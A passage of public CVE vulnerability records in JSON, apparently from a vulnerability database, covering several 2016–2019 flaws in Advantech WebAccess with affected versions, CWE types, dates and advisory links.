"x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-119" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0857", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple heap-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-121", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-121" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-107", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-107" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-119", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-119" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0857", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.129Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-7495
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:31:03.713Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an external control of file name or path vulnerability has been identified, which may allow an attacker to delete files." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-73", "description": "EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-7495", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an external control of file name or path vulnerability has been identified, which may allow an attacker to delete files." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-7495", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-02-26T00:00:00", "dateUpdated": "2024-09-17T02:47:10.070Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0854
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/39735/ | exploit, x_refsource_EXPLOIT-DB | |
http://www.zerodayinitiative.com/advisories/ZDI-16-127 | x_refsource_MISC | |
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-128 | x_refsource_MISC | |
http://www.rapid7.com/db/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-129 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.068Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "39735", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/39735/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-127" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-128" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.rapid7.com/db/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-129" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Unrestricted file upload vulnerability in the uploadImageCommon function in the UploadAjaxAction script in the WebAccess Dashboard Viewer in Advantech WebAccess before 8.1 allows remote attackers to write to files of arbitrary types via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-01T15:57:02", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "39735", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/39735/" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-127" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-128" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.rapid7.com/db/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-129" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0854", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Unrestricted file upload vulnerability in the uploadImageCommon function in the UploadAjaxAction script in the WebAccess Dashboard Viewer in Advantech WebAccess before 8.1 allows remote attackers to write to files of arbitrary types via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "39735", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/39735/" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-127", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-127" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-128", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-128" }, { "name": "http://www.rapid7.com/db/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload", "refsource": "MISC", "url": "http://www.rapid7.com/db/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-129", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-129" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0854", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.068Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-5810
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-429 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T01:15:10.784Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-429" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-07-18T00:00:00", "descriptions": [ { "lang": "en", "value": "upAdminPg.asp in Advantech WebAccess before 8.1_20160519 allows remote authenticated administrators to obtain sensitive password information via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-05-02T13:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-429" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-5810", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "upAdminPg.asp in Advantech WebAccess before 8.1_20160519 allows remote authenticated administrators to obtain sensitive password information via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-429", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-429" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-5810", "datePublished": "2017-05-02T14:00:00", "dateReserved": "2016-06-23T00:00:00", "dateUpdated": "2024-08-06T01:15:10.784Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-14820
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1041939 | vdb-entry, x_refsource_SECTRACK | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C | x_refsource_MISC | |
http://www.securityfocus.com/bid/105728 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: WebAccess Versions 8.3.1 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T09:38:13.987Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/105728" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess Versions 8.3.1 and prior" } ] } ], "datePublic": "2018-10-23T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.1 and earlier has a .dll component that is susceptible to external control of file name or path vulnerability, which may allow an arbitrary file deletion when processing." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-73", "description": "EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-25T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/105728" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-10-23T00:00:00", "ID": "CVE-2018-14820", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "WebAccess Versions 8.3.1 and prior" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.1 and earlier has a .dll component that is susceptible to external control of file name or path vulnerability, which may allow an arbitrary file deletion when processing." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73" } ] } ] }, "references": { "reference_data": [ { "name": "1041939", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1041939" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01,", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01," }, { "name": "105728", "refsource": "BID", "url": "http://www.securityfocus.com/bid/105728" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-14820", "datePublished": "2018-10-23T20:00:00Z", "dateReserved": "2018-08-01T00:00:00", "dateUpdated": "2024-09-16T23:05:35.703Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-13558
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-260-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T23:57:39.463Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Versions 8.4.1 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "In WebAccess versions 8.4.1 and prior, an exploit executed over the network may cause improper control of generation of code, which may allow remote code execution, data exfiltration, or cause a system crash." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-94", "description": "CODE INJECTION CWE-94", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-09-18T21:14:18", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-13558", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "Versions 8.4.1 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess versions 8.4.1 and prior, an exploit executed over the network may cause improper control of generation of code, which may allow remote code execution, data exfiltration, or cause a system crash." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CODE INJECTION CWE-94" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-13558", "datePublished": "2019-09-18T21:14:18", "dateReserved": "2019-07-11T00:00:00", "dateUpdated": "2024-08-04T23:57:39.463Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-13550
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-260-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T23:57:39.475Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "versions 8.4.1 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "In WebAccess, versions 8.4.1 and prior, an improper authorization vulnerability may allow an attacker to disclose sensitive information, cause improper control of generation of code, which may allow remote code execution or cause a system crash." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-285", "description": "IMPROPER AUTHORIZATION CWE-285", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-09-18T20:52:05", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-13550", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "versions 8.4.1 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess, versions 8.4.1 and prior, an improper authorization vulnerability may allow an attacker to disclose sensitive information, cause improper control of generation of code, which may allow remote code execution or cause a system crash." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER AUTHORIZATION CWE-285" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-13550", "datePublished": "2019-09-18T20:52:05", "dateReserved": "2019-07-11T00:00:00", "dateUpdated": "2024-08-04T23:57:39.475Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12706
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.460Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "A stack-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12706", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A stack-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12706", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.460Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-10983
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-178-05 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-621/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | WebAccess | WebAccess/SCADA |
Version: Versions 8.3.5 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:40:15.527Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-621/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "WebAccess", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior" } ] } ], "datePublic": "2019-06-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, an out-of-bounds read vulnerability is caused by a lack of proper validation of user-supplied data. Exploitation of this vulnerability may allow disclosure of information." } ], "problemTypes": [ { "descriptions": [ { "description": "Other", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:06", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-621/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-10983", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior" } ] } } ] }, "vendor_name": "WebAccess" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, an out-of-bounds read vulnerability is caused by a lack of proper validation of user-supplied data. Exploitation of this vulnerability may allow disclosure of information." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Other" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-621/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-621/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-10983", "datePublished": "2019-06-28T20:38:08", "dateReserved": "2019-04-08T00:00:00", "dateUpdated": "2024-08-04T22:40:15.527Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }